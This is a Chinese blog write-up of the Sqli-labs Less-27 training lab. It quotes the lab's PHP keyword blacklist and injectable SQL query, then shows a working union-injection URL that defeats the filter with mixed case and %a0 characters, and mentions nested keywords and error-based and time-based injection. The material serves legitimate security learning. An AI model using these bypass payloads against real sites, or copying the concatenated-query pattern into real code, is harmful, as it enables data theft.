Sqli-labs Less-27 绕过union、select等过滤 union注入

Apr 09 2020

Sqli-labs Less-27 绕过union、select等过滤 union注入

作者：绝缘体.. 发布： 2020-04-09 22:13 分类：未分类阅读：抢沙发

关键代码

function blacklist($id)
{
$id= preg_replace('/[\/\*]/',"", $id);        //strip out /*
$id= preg_replace('/[--]/',"", $id);        //Strip out --.
$id= preg_replace('/[#]/',"", $id);            //Strip out #.
$id= preg_replace('/[ +]/',"", $id);        //Strip out spaces.
$id= preg_replace('/select/m',"", $id);        //Strip out spaces.
$id= preg_replace('/[ +]/',"", $id);        //Strip out spaces.
$id= preg_replace('/union/s',"", $id);        //Strip out union
$id= preg_replace('/select/s',"", $id);        //Strip out select 
$id= preg_replace('/UNION/s',"", $id);        //Strip out UNION
$id= preg_replace('/SELECT/s',"", $id);        //Strip out SELECT
$id= preg_replace('/Union/s',"", $id);        //Strip out Union
$id= preg_replace('/Select/s',"", $id);        //Strip out select
return $id;
}

$id=$_GET['id'];
$id= blacklist($id);
$sql="SELECT * FROM users WHERE id='$id' LIMIT 0,1";
print_r(mysql_error());

PS：正则表达式中的/s表示单行模式匹配，/i表示不区大小写。

本关主要考察将union，select和26关过滤掉的字符。此处我们依旧和26关的方式是一样的，只需要将union和select改为大小写混合就可以突破。

示例：http://127.0.0.1/sql/Less-27/?id=100’unIOn%a0seLect%a01,database(),’3

TIPS：uniunionon也是可以突破限制的。亦可以利用报错注入和延时注入的语法进行注入。

打赏

本文固定链接: https://www.cxy163.net/archives/4973 | 绝缘体

该日志由绝缘体.. 于 2020年04月09日发表在未分类分类下，你可以发表评论，并在保留原文地址及作者的情况下引用到你的网站或博客。
原创文章转载请注明: Sqli-labs Less-27 绕过union、select等过滤 union注入 | 绝缘体
关键字: MySQL, 报错, 注入, 示例, 过滤

【上一篇】Sqli-labs Less-26a 绕过 or、and、注释符、空格、斜杠过滤 union注入
【下一篇】Sqli-labs Less-27a 绕过union、select等过滤 union注入

Sqli-labs Less-27 绕过union、select等过滤 union注入

您可能还会对这些文章感兴趣！

Sqli-labs Less-27 绕过union、select等过滤 union注入：等您坐沙发呢！

发表评论

分类目录

最新日志热评日志随机日志

最活跃的读者

最新评论

标签云集

博客统计

友情链接

用户登录